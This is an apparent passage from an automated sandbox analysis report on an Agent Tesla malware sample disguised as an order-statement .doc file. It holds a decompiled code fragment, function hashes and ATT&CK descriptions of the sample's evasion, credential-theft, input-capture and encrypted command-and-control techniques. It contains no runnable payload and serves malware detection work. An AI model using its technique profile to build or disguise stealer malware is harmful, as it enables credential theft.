						 *_t188 =  *_t188 + _t188;
						_t325 = _t353 + 1;
						asm("aaa");
						_t295 = _t265 - 1;
						 *((intOrPtr*)(_t313 - 0x58fffee5)) =  *((intOrPtr*)(_t313 - 0x58fffee5)) + _t295;
						_push(_t230);
						_t265 = _t295 - 1;
						 *((intOrPtr*)(_t304 + 0x7000011b)) =  *((intOrPtr*)(_t304 + 0x7000011b)) + _t296;
						goto L6;
					}
				}
				_t223 = _t188 ^ 0x000000c9;
			}

0x011e415d
0x011e415d
0x011e415d
0x011e415d
0x011e415f
0x011e4163
0x011e4165
0x011e4166
0x011e4168
0x011e4169
0x011e416c
0x011e416f
0x011e4174
0x011e4176
0x011e4178
0x011e4179
0x011e417c
0x011e417e
0x011e4180
0x011e4186
0x011e4188
0x011e4188
0x011e418b
0x011e418e
0x011e4196
0x011e4198
0x011e4198
0x011e4199
0x011e419b
0x011e419e
0x011e41a0
0x011e41d6
0x011e41d6
0x011e41d8
0x011e41a2
0x011e41a2
0x011e41a2
0x011e41a3
0x011e41a9
0x011e41ab
0x011e41ae
0x011e41b0
0x011e41b6
0x011e41b8
0x011e41b9
0x011e41bc
0x011e41be
0x011e41c0
0x011e41c6
0x011e41c8
0x011e41c9
0x011e41ca
0x011e41cb
0x011e41d1
0x011e41d2
0x011e41d3
0x00000000
0x011e41d3
0x011e41bc
0x011e41d9

Memory Dump Source

Source File: 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, Offset: 011E0000, based on PE: true

Associated: 00000004.00000002.2106809144.00000000011E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2106842204.000000000121E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c58cbfb7a7aba6251415c08de0a13ee486db393ad025042cdec919c20b2927
Instruction ID: 3fb45a7a72c32739aa291f62c0d1d53d559a555c81b18216c059d371d52225b2
Opcode Fuzzy Hash: 46c58cbfb7a7aba6251415c08de0a13ee486db393ad025042cdec919c20b2927
Instruction Fuzzy Hash: C191917244E7C14FD7478B74886A1917FB0AF2322871A55EFC4C0CF8A3E25A9956C762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2712 Parent PID: 2572 poiuytrewsdfghjklmnbvcx.exeCOMMON

Executed Functions

Function 00229496, Relevance: 3.9, APIs: 2, Instructions: 915COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002294DB
KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0d3116d68bcefb74585de199dba68866f5bbc25034da6271ae2bdf6e01ed732e
Instruction ID: 9abf388eb90402bce7feaf7caf32eb2ed81be039c6cc3313e99bf04a62ceb3d4
Opcode Fuzzy Hash: 0d3116d68bcefb74585de199dba68866f5bbc25034da6271ae2bdf6e01ed732e
Instruction Fuzzy Hash: C39214B4A142289FCB25EF70D89479DB7BABF88305F1084E9D50AA7258CB719EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002294B7, Relevance: 3.6, APIs: 2, Instructions: 588COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002294DB
KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f9424f2e08fadbf137b5bfd04e55edfa074be098a6b9311de03bdca692bf22ea
Instruction ID: 157d31d281ded7e3c256b19c4460526f2a7ee1185671f398044fa37563ac4ad5
Opcode Fuzzy Hash: f9424f2e08fadbf137b5bfd04e55edfa074be098a6b9311de03bdca692bf22ea
Instruction Fuzzy Hash: 49523474A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002294FC, Relevance: 2.1, APIs: 1, Instructions: 581COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 10537fdf75a618808e5641aeeb8d1afac402bec93b836a92079100c30b5037b9
Instruction ID: 22316ec51e39e4d7046c12b81e6b79d94ff50c5f574f50ff7451965df35a2d04
Opcode Fuzzy Hash: 10537fdf75a618808e5641aeeb8d1afac402bec93b836a92079100c30b5037b9
Instruction Fuzzy Hash: A1422474A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00229557, Relevance: 2.1, APIs: 1, Instructions: 570COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ddbd4186f6cea86419620544d29f91151134df7468bfa0939d906c04942f33a7
Instruction ID: c74b6a5f48d5c7c8e9af7fed7c59919b70baca3e4f18a657ddfd8480e9ce2b41
Opcode Fuzzy Hash: ddbd4186f6cea86419620544d29f91151134df7468bfa0939d906c04942f33a7
Instruction Fuzzy Hash: 8D422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0022959C, Relevance: 2.1, APIs: 1, Instructions: 563COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b8e88a56700b63a10b153797a897b27e20a0681325c349a7e061fc3cc84b2ca8
Instruction ID: cb200572807752d927743771ed7ff949f642047825127f668e0af860f8af677d
Opcode Fuzzy Hash: b8e88a56700b63a10b153797a897b27e20a0681325c349a7e061fc3cc84b2ca8
Instruction Fuzzy Hash: E0422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002295E1, Relevance: 2.1, APIs: 1, Instructions: 556COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b4a45ec1d2edfe41347be4729799c5628b1790647497c77bf1cebcf6273925c6
Instruction ID: 2648550a58438ad25b6e11fbf88e8130915c3af503fe179e8439f81ed7d785a1
Opcode Fuzzy Hash: b4a45ec1d2edfe41347be4729799c5628b1790647497c77bf1cebcf6273925c6
Instruction Fuzzy Hash: D7422574A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00229626, Relevance: 2.0, APIs: 1, Instructions: 549COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 546a4e31a89e9275f8967186af8cf818c699e0158097ab11ca5aab899a146f93
Instruction ID: eff03a5a98fce65e7b8dbe5cbfa519502983687c077e865e1eb3b7796ab7e1ac
Opcode Fuzzy Hash: 546a4e31a89e9275f8967186af8cf818c699e0158097ab11ca5aab899a146f93
Instruction Fuzzy Hash: E0422674A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7258CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0022966B, Relevance: 2.0, APIs: 1, Instructions: 542COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 58cd23c40513824443ac8af5be20a7aaf2df2a5baad908d22f41072627e40f46
Instruction ID: dbf66fa1a177c1f351504a4bf93157be7051c27b688564f125e6cafb32d3f727
Opcode Fuzzy Hash: 58cd23c40513824443ac8af5be20a7aaf2df2a5baad908d22f41072627e40f46
Instruction Fuzzy Hash: 9C422674A14228DFCB28EF70D89479DB7BABF88305F1084E9D50AA7254CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002296B0, Relevance: 2.0, APIs: 1, Instructions: 535COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9ebc4f211e1ac7fb82cb8b73a40d1d542213b5ca203fc810973335abd9c831bf
Instruction ID: 78431ce81b4d34de884ef13c8888aa3b1a78df8585472d7fd2f403cd92ca755e
Opcode Fuzzy Hash: 9ebc4f211e1ac7fb82cb8b73a40d1d542213b5ca203fc810973335abd9c831bf
Instruction Fuzzy Hash: 18322674A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002296F5, Relevance: 2.0, APIs: 1, Instructions: 528COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: eed6eeff929aab0c2510bcf2db300695877c1b160732c399dd56fd1786355e7c
Instruction ID: 42e1d5fd9cdaea2bfc34e5e965acb73cbb0abd2d660bc5690ac518b5f327577c
Opcode Fuzzy Hash: eed6eeff929aab0c2510bcf2db300695877c1b160732c399dd56fd1786355e7c
Instruction Fuzzy Hash: F7322574A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0022973A, Relevance: 2.0, APIs: 1, Instructions: 521COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0022975E

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0de9490f76c55b2770bdf2b34c0e9e1b09c45098d8db7da5c3c934a3dc1bfd25
Instruction ID: e09cfdc0ff28f578f0fb9fd7d9d274fbb58d86129ac53179e5b198f21fbd2bc2
Opcode Fuzzy Hash: 0de9490f76c55b2770bdf2b34c0e9e1b09c45098d8db7da5c3c934a3dc1bfd25
Instruction Fuzzy Hash: 47322674A14228DFCB28EF70D89879DB7BABF88305F1084E9D50AA7254CB719E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0022DEA9, Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0022DFC1

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9b04ce3977833c5debb2dfcc305296612a23e70a99efea80fe882a189e70bcfe
Instruction ID: 7b33ebea65ee56da88a26b15e9701c089ca9a9066efdac048a3beb56f560034d
Opcode Fuzzy Hash: 9b04ce3977833c5debb2dfcc305296612a23e70a99efea80fe882a189e70bcfe
Instruction Fuzzy Hash: 3E4174B0E142599FCB11CFE9D884A9EBFF2AF48310F25846AE808EB255C3719805CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0022BD30, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0022DFC1

Memory Dump Source

Source File: 00000006.00000002.2348916481.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7eff5573adfeda67c969488607e44f3ce0c42590f518db5ec33d758ee862f911
Instruction ID: 01521aa9b1d758716e03a8a92db599a1cb23eabc8a67ee811fb6a71478dcabf3
Opcode Fuzzy Hash: 7eff5573adfeda67c969488607e44f3ce0c42590f518db5ec33d758ee862f911
Instruction Fuzzy Hash: DF31E2B1D10258AFCB20CFDAD584A9EBBF5BF48710F15842AE819AB214C7B19945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0012D48C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
Instruction ID: ac24f49c00326a402abe4b32f9f5cc2c87341f5b1c10fc0860d7eda641ab7516
Opcode Fuzzy Hash: c3f7fac265b0831911771f997b3210a4f67312f9b2ac64996166288d242fb586
Instruction Fuzzy Hash: 11213775600244DFCB05DF10F9C0B26BFB6FB98328F24C569E8050B246C376E866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D578, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
Instruction ID: 0929ac2b5fe68f444bb83bd108d09041e00bec9e9c4482d185ce42a063ab47e8
Opcode Fuzzy Hash: 132a0a12eb1df3790efda76f2a69e05aa0c0af02317c167e37e14536fc01e4f3
Instruction Fuzzy Hash: 66213475204244DFDB15CF50F9C4B2ABFA5FB98318F3485A9E8090B246C336E866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
Instruction ID: 849c282c8d2675e6d3403bf423ad6d707d402cfc61910d265b18eed8a96a33a4
Opcode Fuzzy Hash: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
Instruction Fuzzy Hash: 9221F275604204DFDB18CF60F984B16BBA5FB88B14F24C9A9E8494B346C336D847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24aba548d23e8ec98c32d49a2a053aeaa8926af7a48f3c5599024fc60fcdaa4
Instruction ID: 5ef8cea63552cef73d2a1819bdc5b6f7434c58812657d1807f9d5e79a9d48def
Opcode Fuzzy Hash: c24aba548d23e8ec98c32d49a2a053aeaa8926af7a48f3c5599024fc60fcdaa4
Instruction Fuzzy Hash: 9621D7B5604344DFDB04CF60D5C4B16BBE5FB98714F24C969D8494B382C736E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
Instruction ID: 4698269574757a894325b314b47f151c30b48a5e4acc66bdc8d2addee85b8ffa
Opcode Fuzzy Hash: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
Instruction Fuzzy Hash: 0C2141755083809FCB06CF14E994715BFB1EB46714F24C5DAD8498F256C33AD856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012D487, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: c5ff1bf99ad9758d007037043650640b1e31824eb95eb1686963ab4eb24baf42
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 4911D376504280CFCB02CF10E5C4B16BF72FB94314F24C6A9D8094B256C37AD866CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0012D573, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: 54ba13d556085afd9530cc980f22d6d0fa66daf6bebc92b98b56526fb8f40226
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 6711E676504280CFCF12CF10E5C4B16BF71FB95314F24C5A9D8090B616C336D866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348871566.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction ID: 6c84480d853a7de5ed729448cc591acfdf0c6b1d56beecc1c891c0bf05b13212
Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction Fuzzy Hash: 56119D79504380DFCB05CF10D5C4B15BFA2FB85314F28C6A9D8494B696C33AE85ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D795, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387b16c8928abf67b953e84d4967846b5a4c404322c2cf4f4df46dac0197ff6d
Instruction ID: 595e2fcf8d905d993bfcc27f6b6ecf3606c7a7c4597aee8581c603a593e72a72
Opcode Fuzzy Hash: 387b16c8928abf67b953e84d4967846b5a4c404322c2cf4f4df46dac0197ff6d
Instruction Fuzzy Hash: 8401A731004354DBD7208F55E988BA7BFDCEF91728F24845AE9491A286C37D9850C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D794, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2348860604.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9f5b738ed00d0fed303a5408c62b68a367f1d7569a1459029cc5180b8f6fff
Instruction ID: 51d38b57100582d0561692159a3256b8d2e0145b0561d9a8f52c1811bd3dd906
Opcode Fuzzy Hash: 4b9f5b738ed00d0fed303a5408c62b68a367f1d7569a1459029cc5180b8f6fff
Instruction Fuzzy Hash: 4EF062714042549FEB208E15E888B62FFD8EB91724F28C55AED485B286C3799C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Pending Orders Statement -40064778.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

SMTP Packets

